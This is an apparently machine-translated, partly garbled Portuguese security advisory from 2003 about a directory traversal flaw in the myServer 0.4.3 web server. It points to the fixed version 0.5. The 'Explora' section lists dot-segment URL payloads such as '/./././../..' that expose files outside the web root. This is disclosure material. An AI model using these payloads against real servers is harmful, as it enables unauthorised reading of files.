myServer 0.4.3 Vulnerabilidade Do Traversal De Diretório
. Oo De Resumo Do oO.
versão do myServer 0.4.3 mostra arquivos e diretórios que residem exterior a
diretório de raiz de web normal.
Descoberto em 2003, Agosto, 23th
Vendedor:
Myserver (http://myserverweb.sourceforge.net/forum/portal.php)
MyServer um liberado, programa de servidor de web poderoso é projetado continuar um
computador pessoal pelo usuário de computador médio. Isto é um multithread
aplicação e suporta HTTP, CGI, ISAPI, WinCGI e protocolos do FastCGI. Isto
é disponível no Windows e Sistema Operacional Do Linux. Este servidor de web pode
mostra arquivo e conteúdo de diretório que reside exterior a raiz de web normal
diretório.
Texto Original está em
http://www.securiteinfo.com/attaques/hacking/myServer0_4_3.shtml
.oO Details Oo.
A vulnerabilidade pode ser feita usando qualquer browser. Você somente tem enviar um
especialmente construído ponto-ponto URL ao retreive qualquer exterior de arquivo da raiz
diretório.
.oO Explora Oo.
Você tem criar uma ponto-ponto URL com o mesmo número de"/./" and "/../" + 1.
For example, you can use :
/././..
/./././../..
/././././../../..
/./././././../../../..
etc...
.oO Solution Oo.
O vendedor tem sido informado e tem resolvido o problema.
Descarregue MyServer 0.5 em
http://sourceforge.net/project/showfiles.php?group_id=63119

Cracks's S.A